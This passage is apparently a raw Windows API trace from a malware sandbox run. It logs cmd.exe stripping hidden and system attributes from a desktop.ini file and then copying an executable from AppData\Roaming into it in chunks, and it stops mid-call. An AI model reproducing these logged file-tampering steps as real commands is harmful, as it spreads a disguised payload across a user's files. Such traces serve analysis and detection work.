0x2 [0143.930] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eef00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef00) returned 0x440810 [0143.930] FindClose (in: hFindFile=0x440810 | out: hFindFile=0x440810) returned 1 [0143.930] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0143.930] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0143.930] GetConsoleTitleW (in: 
lpConsoleTitle=0x2ef3f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.930] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef280, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef348 | out: lpAttributeList=0x2ef280, lpSize=0x2ef348) returned 1 [0143.930] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef280, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef340, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef280, lpPreviousValue=0x0) returned 1 [0143.930] GetStartupInfoW (in: lpStartupInfo=0x2ef23c | out: lpStartupInfo=0x2ef23c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0143.930] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0143.931] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef2dc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef328 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" ", lpProcessInformation=0x2ef328*(hProcess=0x50, hThread=0x4c, dwProcessId=0x53c, dwThreadId=0x9c4)) returned 1 
[0144.019] CloseHandle (hObject=0x4c) returned 1 [0144.019] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0144.019] GetEnvironmentStringsW () returned 0x440aa0* [0144.019] FreeEnvironmentStringsW (penv=0x440aa0) returned 1 [0144.019] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0144.139] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef21c | out: lpExitCode=0x2ef21c*=0x0) returned 1 [0144.140] CloseHandle (hObject=0x50) returned 1 [0144.140] _vsnwprintf (in: _Buffer=0x2ef364, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef228 | out: _Buffer="00000000") returned 8 [0144.140] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0144.140] GetEnvironmentStringsW () returned 0x442670* [0144.140] FreeEnvironmentStringsW (penv=0x442670) returned 1 [0144.140] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0144.140] GetEnvironmentStringsW () returned 0x442670* [0144.140] FreeEnvironmentStringsW (penv=0x442670) returned 1 [0144.140] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef280 | out: lpAttributeList=0x2ef280) [0144.140] GetConsoleTitleW (in: lpConsoleTitle=0x2ef600, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.141] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ee678, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2ee67c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ee678*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0144.141] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0144.141] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0144.141] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0144.141] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\desktop.ini")) returned 0xffffffff [0144.141] GetLastError () returned 0x2 [0144.141] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1")) returned 0x10 [0144.141] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0144.142] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0144.142] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\desktop.ini")) returned 0xffffffff [0144.142] GetLastError () returned 0x2 [0144.142] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x4436fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4436fc) returned 0xffffffff [0144.142] GetLastError () returned 0x2 [0144.142] _get_osfhandle (_FileHandle=2) returned 0xb [0144.142] GetFileType (hFile=0xb) returned 0x2 [0144.142] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0144.142] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2ef078 | out: lpMode=0x2ef078) returned 1 [0144.142] _get_osfhandle (_FileHandle=2) returned 0xb [0144.142] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2ef0ac | out: lpConsoleScreenBufferInfo=0x2ef0ac) returned 1 [0144.143] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0144.143] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.143] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.143] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.143] GetFileType (hFile=0x7) returned 0x2 [0144.144] GetStdHandle 
(nStdHandle=0xfffffff5) returned 0x7 [0144.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef79c | out: lpMode=0x2ef79c) returned 1 [0144.144] _dup (_FileHandle=1) returned 3 [0144.144] _close (_FileHandle=1) returned 0 [0144.144] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini", _String2="con") returned -53 [0144.144] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2ef76c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0144.145] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0144.145] GetConsoleTitleW (in: lpConsoleTitle=0x2ef59c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.145] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x2ef100, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef100) returned 0x43e6f0 [0144.145] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0144.145] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0144.145] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0144.145] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ee00c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0144.145] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0144.145] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.146] GetFileType 
(hFile=0x58) returned 0x1 [0144.146] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.146] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x2ee064 | out: lpFileSizeHigh=0x2ee064*=0x0) returned 0x7d600 [0144.146] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.146] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.146] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.146] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.147] GetFileType (hFile=0x50) returned 0x1 [0144.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.147] GetFileType (hFile=0x50) returned 0x1 [0144.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.147] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.148] GetFileType (hFile=0x50) returned 0x1 [0144.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.148] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.148] GetFileType (hFile=0x50) returned 0x1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.149] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0144.149] GetFileType (hFile=0x50) returned 0x1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] GetFileType (hFile=0x50) returned 0x1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] GetFileType (hFile=0x50) returned 0x1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] GetFileType (hFile=0x50) returned 0x1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.149] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.149] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.149] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.149] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.149] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, 
lpOverlapped=0x0) returned 1 [0144.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] GetFileType (hFile=0x50) returned 0x1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] GetFileType (hFile=0x50) returned 0x1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] GetFileType (hFile=0x50) returned 0x1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] GetFileType (hFile=0x50) returned 0x1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] GetFileType (hFile=0x50) returned 0x1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] GetFileType (hFile=0x50) returned 0x1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 
| out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.150] GetFileType (hFile=0x50) returned 0x1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] GetFileType (hFile=0x50) returned 0x1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.151] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.151] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.151] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.151] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] GetFileType (hFile=0x50) returned 0x1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] GetFileType (hFile=0x50) returned 0x1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] GetFileType (hFile=0x50) returned 0x1 [0144.151] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0144.151] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] GetFileType (hFile=0x50) returned 0x1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.151] GetFileType (hFile=0x50) returned 0x1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] GetFileType (hFile=0x50) returned 0x1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] GetFileType (hFile=0x50) returned 0x1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] GetFileType (hFile=0x50) returned 0x1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 
[0144.152] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.152] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.152] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] GetFileType (hFile=0x50) returned 0x1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] GetFileType (hFile=0x50) returned 0x1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.152] GetFileType (hFile=0x50) returned 0x1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] GetFileType (hFile=0x50) returned 0x1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 
[0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] GetFileType (hFile=0x50) returned 0x1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] GetFileType (hFile=0x50) returned 0x1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] GetFileType (hFile=0x50) returned 0x1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] GetFileType (hFile=0x50) returned 0x1 [0144.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.153] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.153] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.153] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.154] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.154] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, 
lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] GetFileType (hFile=0x50) returned 0x1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] GetFileType (hFile=0x50) returned 0x1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] GetFileType (hFile=0x50) returned 0x1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] GetFileType (hFile=0x50) returned 0x1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] GetFileType (hFile=0x50) returned 0x1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] GetFileType (hFile=0x50) returned 0x1 [0144.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.154] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, 
